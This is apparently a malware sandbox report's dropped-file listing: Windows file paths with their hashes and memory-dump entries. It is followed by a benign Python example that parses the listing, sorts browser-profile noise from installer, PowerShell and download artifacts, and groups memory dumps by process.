| MD5 | 660fd451e2b14c931583d9050d1f3c3c |
| SHA1 | 7e0297ca59ba751bd691ca586b01507d7d0bb769 |
| SHA256 | 3f0febd8ebfe204913f7278f99b259d69cc3b5a0b62d27efc6d598827f88258e |
| SHA512 | e88a29553172eee51ee4b2738cbfd4a19b5369e1fce92081c3c98f1aae45583b5f31b7d49339f16a2a887f9199ab92b02d90235d61957e713f343f579523289b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2a097f3bc73b2df5ed61b791e547a17a |
| SHA1 | 39a43bc045a2a4238de78e74f8101c88b1f2f9c0 |
| SHA256 | 7845dcf4f9c7d1ea908bbbb936408e8af25980514b51ecfd33cbeb4a17c46c4e |
| SHA512 | 28cc846ad3213eb290cb2ba533996f03432d9c4046b6852390402d8a4a240814baaa53ae3ef255ca5014d5e977c02f4141a99c0387150946880f8b2f5baaad05 |
memory/4724-2352-0x0000000000CB0000-0x0000000000CC2000-memory.dmp
memory/4724-2353-0x0000000005600000-0x0000000005666000-memory.dmp
memory/4724-2354-0x0000000005B00000-0x0000000005B9C000-memory.dmp
memory/4724-2355-0x0000000005A60000-0x0000000005AA0000-memory.dmp
memory/3324-2361-0x0000000006190000-0x0000000006292000-memory.dmp
memory/5176-2362-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/5176-2364-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/5176-2363-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/5176-2365-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/5176-2366-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/5176-2367-0x00007FFB0B9B0000-0x00007FFB0B9C0000-memory.dmp
memory/5176-2368-0x00007FFB0B9B0000-0x00007FFB0B9C0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | 66a0327ba4cf03fb370fba56ff40cfa6 |
| SHA1 | 0ca235abf1e8afa8ce97a1c8578758fd141db33f |
| SHA256 | 051bdf2afdd582b61075e505a26fafea2d9bc99c2b740ee326f278755f30526b |
| SHA512 | fb1fe1f3d3041c0653e7c8dc6ee0692d8bdd98c25fa79db780c2a5945c00a53160db867a878d49c6e7238425bef9b8f50ca4cf1c3b1e65d8e576dcf87371733c |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 51a74b2f766fbd1a880968d29ec18b3f |
| SHA1 | 27f57a8b0f3b002a74eaec3aa6207c74980d1ce3 |
| SHA256 | 5b01639434e27fd4558b6bc73d54597f95b5befb4179723ee7710fe242e15e85 |
| SHA512 | c035f5aed1f5e965cb9bb637e0339102bfed345d92730dc37b53cabf18e8f18525b3c30e2b524344f71f0256874f66f5a925a7a15c16bde0d00d1a30b94a68fa |
C:\Users\Admin\AppData\Local\Temp\TCD92CD.tmp\sist02.xsl
| MD5 | f883b260a8d67082ea895c14bf56dd56 |
| SHA1 | 7954565c1f243d46ad3b1e2f1baf3281451fc14b |
| SHA256 | ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353 |
| SHA512 | d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e |
memory/5176-2843-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/5176-2844-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/5176-2845-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/5176-2842-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/2184-2846-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp
memory/2184-2848-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp
memory/2184-2847-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp
memory/2184-2852-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp
memory/2184-2853-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp
memory/2184-2858-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp
memory/2184-2857-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp
memory/2184-2856-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp
memory/2184-2855-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp
memory/2184-2854-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\8c5c12da-b70b-4c00-98fb-d7c15e421822.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 55588d8b11009b19f183e78a9d31035a |
| SHA1 | 214bef840662f3d5e7bfddcdf767ef301fbebccf |
| SHA256 | 82c27004db19412e101c753f3a2e941a7148837cc6dfc444029cca398bff5d98 |
| SHA512 | d5a6bff9530526e9bae9fb44af0c180558cd33c1aeab070ff265beaaaa802c6cebb5d20ca16536477255dac7633a05a0942f91ee90377cd02122c4998337269f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 6dc798612bceeb491dfa22e8224db2d9 |
| SHA1 | b5ca6b5310d2a734c62152042857a4c099b82963 |
| SHA256 | 6f69c0e744c654d69e8420003cd14adeee8a8edab0d55c9d596abe3507b738e5 |
| SHA512 | c2c18cd124ee798550cee507cb96ec40a55df2b17b55f461a088079c1e2ba66e074d54824b234916c5a1227d08908bbf2183d21ebdbdb4b6eba9ef0a48575b56 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 882b0eda3668deb4e9c04274db65bb36 |
| SHA1 | 84f8d1d008735aac1e616c9ddf6cb30f4f9981a2 |
| SHA256 | 9e8492f6e168088c1614088cd7ff3e8db2ca7e24d2bce5cc8acebde69bc401ea |
| SHA512 | 3bf1b9cc306c79b3fa02093fa2323d92b18fe6a11b3c74577da71c0cfbf3a7512de315fbd1a9f74bb9b3e08d5428edda809bc8429d5e5f053ac7b325e59764d2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 8596001236ac7b62382a47a2a0548bcf |
| SHA1 | cd480cf2fb7c5952f001f57ecf1be9643e1ee638 |
| SHA256 | cedd352b52db62a3b0a90094c8a001a9e855b6c325b036f2bc93d90cdfa054a2 |
| SHA512 | 646939986fa279183d80acb4967f671e83d44ceb3966acd4ec4c87f5afc6685d10ef9bf5598ecc55ff229cd5e1d78d060e1c8a830ebc80b534e788f52a44342c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c
| MD5 | c594a826934b9505d591d0f7a7df80b7 |
| SHA1 | c04b8637e686f71f3fc46a29a86346ba9b04ae18 |
| SHA256 | e664eef3d68ac6336a28be033165d4780e8a5ab28f0d90df1b148ef86babb610 |
| SHA512 | 04a1dfdb8ee2f5fefa101d5e3ff36e87659fd774e96aa8c5941d3353ccc268a125822cf01533c74839e5f1c54725da9cc437d3d69b88e5bf3f99caccd4d75961 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b
| MD5 | 3e552d017d45f8fd93b94cfc86f842f2 |
| SHA1 | dbeebe83854328e2575ff67259e3fb6704b17a47 |
| SHA256 | 27d9c4613df7a3c04da0b79c13217aa69992b441acb7e44bf2a7578ca87d97d6 |
| SHA512 | e616436f2f15615429c7c5c37de3990c3e86c5e1da7d75a0f524fc458b75d44a5be1a3648a628d63e1cf8aa062e08b538f2f2bc9c6a0b42157beb24f82c571d9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 394b7cf96b44c1882e00ac40f52462e8 |
| SHA1 | a8042ffeeae5216363ee5f271519ef9b23fdf8b9 |
| SHA256 | a31f5c1f0cf980bb3fbe02c45043384e88dccf17e2aa66895558e49589aeb5cc |
| SHA512 | db635803b4771fe433cc5ecf4b9526b655add108657da826c04def6a1308fb2eef9540188126e2a839b078b96c02356025b1e2b783654c747cd649331928531d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 8c248deb636a3cf06766e063893b80dc |
| SHA1 | fa7472c4476271d1269c47fd91075d6218f2673b |
| SHA256 | 13a70ab0497f4452ab5b83d2943d857c6f97bc3e4e7fde26e2265a7327fb15f2 |
| SHA512 | a0f6423ebe8d437419849ea42a06597b0f2150819792aad5eff497eb294f817c9f088f217dde0088589121a4ae75644a3061f302f63ee2a3f200fe24779edc27 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 810ef7316a212b8bd5312f4ff0bf70b5 |
| SHA1 | 549fd39a3eeac04bc249ad356b4639fce296666f |
| SHA256 | ca684bf4497fa91abbddefc5a6c0a500b8f641f4418beb8610dc2fa677eaac55 |
| SHA512 | 20b8aeff1ecaac814e776e2e6b79b6637e7329636ff4b68d78441d34d37ee6f7baed096d91d19aefcea16ab2227b6fbe6ac63df10ae49e454043f5babec423a4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ecb8db40ae8c6a3ff764ba48acc89c78 |
| SHA1 | a30dafc2e1c6e42e1b28b9a4ffb1804fc0cf2436 |
| SHA256 | 76d0e28d41cf4a926aed9e7d4ba9865297a6d017f94622eaf7cfe55ed5b660be |
| SHA512 | a8554daf9c4fb14571e33d0453b6a45f72113179f77d1dcb671707f42a441079b4c48c61425b51d18540a587e4dcf769b798109e4350316460d43752b93bf1aa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | bae164fcaf40542f721a7b1084cbb144 |
| SHA1 | f727e9ba5a106f77be1ca3685ef6706bc00b32ba |
| SHA256 | 8a0f63c5974c87c8689a70202ec4eac7f7024affe56ddb49844c4e94ed6a3c6b |
| SHA512 | be7ebf0016f8d553afaa360652d6cfad0785a82c3c42ca6014efb143a3c619aa8f67bac702e68d182bc71f5482701a59685f5d0a96f6617e34812fe9cc73c38e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 5e4494cca55bec01872a3c49ced808d6 |
| SHA1 | d0fc5475b6891104d3df7f503c208add977fddad |
| SHA256 | c9d7f4070ed9641ef0469ffbd604f21d93727592f3f1960b73c6c30f70948902 |
| SHA512 | d4129ebbbe12c7ea6dbd150cc0896f4f923331b44bd2e200bccffad1284bf14be68c007dd663758bf06be610502289203464e3fa1ef9501a81fc39220fc75b5a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
memory/3116-3177-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/3116-3179-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/3116-3178-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/3116-3180-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/3116-3181-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | 7a699530e4b7784c7b2e5e3ded5ef279 |
| SHA1 | f4a93e4e552f1e9bba2524d89c116366fa44fffc |
| SHA256 | 5000e2e9680de9d2295a8cc8805c094e28b2d6d1f8d39dda831df2b194d30c24 |
| SHA512 | e772270ad7fb9514c6e5d5b8b78d9ff010cd67b7b279a5f485df9005c371e0bcc85e6551c6c03c7691f7f3e9750335e540c632fc3e99f9904ce2bdf8a4710f8a |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 182019040531705b8a741656825def9c |
| SHA1 | d659414b2dd65a0d535415a851c3d0f2b1ee30d9 |
| SHA256 | c05ac0dddefd90d116a1438008ac4aebe1ac811bad096d1e8f465e4563b4f6ee |
| SHA512 | 4716a208e33604aab320cbf220fa09390d6a35b865d5a89ec0ff2e122bde3959099ee494701b4b9a39b4a275cca0a392d2d47abec5d12c951dde0533ba9d198c |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 5adf33653978d4aa3ec36cf9c891362c |
| SHA1 | 0604e46191c6077e35b4f359d101f4f2876aca82 |
| SHA256 | cf84e13e9338926dc3d49ec735c5979499bda9191d384ec89e39371d1645b390 |
| SHA512 | e37ea5cb7edbace8fe1ce2890449e04578e59b7518e568a5d79cf03c2a9f43f28903e32fcaa5bd97545695185aa1c3d5982f3ec234c06740c600465be5c1100f |
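The dropped-file listing above is raw sandbox output: browser-profile churn (Edge and Chrome Preferences, TransportSecurity, cache entries) is interleaved with the artifacts that actually matter for this detonation, the downloaded zip and MSI, the Windows Installer temp file and rollback scripts, the PowerShell script-policy test file, and the memory dumps. The Python below is an added example, not part of the report or the sandbox's own tooling: it parses this listing format into records, rejects digests of the wrong length, separates noise from interesting artifacts, and groups the memory dumps by PID so repeated dumps of the same region stand out. The embedded sample is a constructed excerpt of entries copied from the listing above; the noise/interest classification rules are this example's own assumptions, not anything the sandbox asserts.

```python
import re
from collections import defaultdict

# Constructed excerpt of the listing above (paths and hashes copied from the page).
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8588b1756e9edd053db586bfd4ef5f42 |
| SHA1 | eec481b51315700e39540eb1395b837610b10d7e |
| SHA256 | 801e7fb92bcc9e3b745d53981b72efdcd3665ae36090bbc98de6f4ff14779e0c |
| SHA512 | 266afe4e2a65e501f278c5154125d2a583cece11075eea0fd049593a1dabb8efa12157450b121d4c91afcc983ce5891016a899490b041e1936c36896888732ff |
C:\Users\Admin\Downloads\_x64__x32__installer__.zip
| MD5 | 2688578be19130e4f567c7ab0588904a |
| SHA1 | 8ea760acac456d51ba85543a2e9017f4a565ff6c |
| SHA256 | 94c7cf630ea81de4dbb4db3b031b96a90afc2ae1f3da6d329910e4fc1a51629c |
C:\Users\Admin\Downloads\x64__installer__v2.0.5.msi
| MD5 | acf3049f9a32d9c2d30d0546e7a4249a |
| SHA1 | 491fbaf36bbb029601daf0e73ff17179f6f8ebd9 |
| SHA256 | 4e5def247c481ea835d423ca3134dc1192dc688693676ac6730c5e60ab269f61 |
| SHA512 | 02a40cd23470dff49afb6dcb80e7313b78aeb5bcd50ff564a7756aa01589379cae04953d6f50d0f22d6a251696a52702cdfde4f8daa7829b1e74d019fa66b900 |
C:\Windows\Installer\MSIED6E.tmp
| MD5 | b158d8d605571ea47a238df5ab43dfaa |
| SHA1 | bb91ae1f2f7142b9099e3cc285f4f5b84de568e4 |
| SHA256 | ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504 |
C:\Config.Msi\e5aea64.rbs
| MD5 | 200bb076ce43cf8778ed59fb99b49c30 |
| SHA1 | d9e12d0dea83513454436f5f8d6f4340f156f320 |
| SHA256 | 8ae78afa8d7604faeb0ae0aa9fe46096c5aa999d6cbf4f8f844335aa9095ccce |
memory/5220-1587-0x0000000000660000-0x0000000000689000-memory.dmp
memory/5220-1588-0x0000000000660000-0x0000000000689000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yd5fxyio.zj1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5488-1611-0x000001B1A29E0000-0x000001B1A2A62000-memory.dmp
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

# Assumed classification (this example's rules, not the sandbox's): browser-profile
# and Recent/Office churn is noise; installer, PowerShell and download paths are of interest.
NOISE_PREFIXES = (
    r"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data",
    r"C:\Users\Admin\AppData\Local\Google\Chrome\User Data",
    r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent",
    r"C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent",
)
INTEREST_RULES = (
    ("windows-installer", lambda p: p.startswith((r"C:\Windows\Installer", r"C:\Config.Msi"))),
    ("powershell", lambda p: "__PSScriptPolicyTest" in p or p.lower().endswith(".ps1")),
    ("download", lambda p: p.startswith(r"C:\Users\Admin\Downloads")),
)


def classify(path):
    for label, rule in INTEREST_RULES:
        if rule(path):
            return label
    return "browser-noise" if path.startswith(NOISE_PREFIXES) else "other"


def parse_listing(text):
    """Return (files, dumps): file records with path/category/digests, and memory-dump records."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            start, end = int(m.group(3), 16), int(m.group(4), 16)
            dumps.append({"pid": int(m.group(1)), "index": int(m.group(2)),
                          "start": start, "end": end, "size": end - start})
            current = None
            continue
        m = ROW_RE.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if current is None:
                raise ValueError(f"hash row without a preceding path: {line}")
            if len(digest) != HASH_LEN[algo]:  # catch truncated or garbled digests
                raise ValueError(f"{algo} for {current['path']}: length {len(digest)}, expected {HASH_LEN[algo]}")
            current[algo.lower()] = digest
            continue
        current = {"path": line, "category": classify(line)}  # any other line starts a new record
        files.append(current)
    return files, dumps


def interesting_sha256(files):
    """Sorted, de-duplicated SHA256 list for every record that is not browser noise."""
    return sorted({f["sha256"] for f in files if f["category"] != "browser-noise" and "sha256" in f})


def dump_regions_by_pid(dumps):
    """pid -> {(start, end): count}; a count above 1 means the same region was dumped repeatedly."""
    out = defaultdict(lambda: defaultdict(int))
    for d in dumps:
        out[d["pid"]][(d["start"], d["end"])] += 1
    return {pid: dict(regions) for pid, regions in out.items()}


if __name__ == "__main__":
    files, dumps = parse_listing(SAMPLE)
    for f in files:
        print(f"{f['category']:18} {f.get('sha256', '?')[:16]}  {f['path']}")
    for pid, regions in dump_regions_by_pid(dumps).items():
        for (s, e), n in regions.items():
            print(f"pid {pid}: 0x{s:X}-0x{e:X} ({e - s} bytes) x{n}")
```

Feeding the whole listing instead of the excerpt shows the same pattern: the `Preferences`, `TransportSecurity` and `Local State` paths recur with a fresh digest on every write, so hash-level deduplication alone does not shrink the set; the path-based classification does. The memory grouping makes the repeated dumps of PID 5220's `0x660000-0x689000` region visible as one range with a count, which is the range a practitioner would pull into a disassembler first.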